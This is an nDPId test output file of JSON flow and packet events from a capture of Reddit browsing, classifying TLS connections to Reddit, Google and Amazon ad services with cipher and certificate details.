-00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291689408,"flow_last_seen":1605291689408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291689408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605291689408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689408,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYYAAAAAoAL9IMRnAAACBAWgBAIICql08xMAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7110,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605291689433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689433,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ86cETj6GHoBJXgAFCAAACBAV4AQMDAwQCCArC10XLqXTzEw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7111,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605291689433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291689433,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYd2fOnCgBAB+4U5AAABAQgKqXTzLcLXRcs="} 
-00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690373,"flow_last_seen":1605291690373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690373,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605291690373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690373,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2UAAAAAoAL9IFr7AAACBAWgBAIIClRf7UgAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690384,"flow_last_seen":1605291690384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690384,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605291690384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690384,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDEAAAAAoAL9IAqWAAACBAWgBAIICgxmJysAAAAAAQMDBw=="} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9082,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690396,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHPls7Xl4+krtmoBJXgDq4AAACBAV4AQMDAwQCCArC10mNVF\/tSA=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690396,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2ZbO15fgBAB+76yAAABAQgKVF\/tX8LXSY0="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9086,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605291690402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690402,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvnyP\/5OOmbspwyoBJXgGsCAAACBAV4AQMDAwQCCArC10mUDGYnKw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9087,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1605291690402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690402,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDL\/+TjqgBAB++8BAAABAQgKDGYnPcLXSZQ="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690405,"flow_last_seen":1605291690405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690405,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605291690405,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690405,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15YAAAAAoAL9IOjCAAACBAWgBAIICgKUPwEAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690421,"flow_last_seen":1605291690421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1605291690421,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690421,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYMAAAAAoAL9IIEIAAACBAWgBAIICl8E6ogAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9093,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690440,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADRffKUqAcsBIEmLB5kd7IUo3\/YpAbu2Nv\/zx++bDteXoBJXgLoLAAACBAV4AQMDAwQCCArC10m3ApQ\/AQ=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690440,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15f\/88fwgBAB+z36AAABAQgKApQ\/JMLXSbc="} 
-00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9098,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690449,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvo6PvOtUOc0w2EoBJXgGkiAAACBAV4AQMDAwQCCArC10m3XwTqiA=="} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690449,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYT7zrVEgBAB++0WAAABAQgKXwTqpcLXSbc="} -01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690421,"flow_last_seen":1605291690449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9134,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690421,"flow_last_seen":1605291690483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690483,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"8a755a3fef0b189d8ab5b0d10758f68a.safeframe.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9160,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690405,"flow_last_seen":1605291690501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":1877,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1605291690501,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01317{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9166,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605291690405,"flow_last_seen":1605291690502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5957,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1605291690502,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","server_names":"aax-eu.amazon-adsystem.com,aax.amazon-adsystem.com,aax-cpm.amazon-adsystem.com,aax-dtb-web.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"49b45fc1ab090aa3a159778313fc9b9e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Amazon, OU=Server CA 1B, CN=Amazon","subjectDN":"CN=aax-eu.amazon-adsystem.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"5D:18:8E:CB:B7:91:5C:79:26:B5:08:49:FF:2C:24:D8:06:54:91:8B"}} 
-00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690926,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dQAAAAAoAL9IKwyAAACBAWgBAIIChrDFp8AAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690926,"flow_last_seen":1605291690926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690926,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
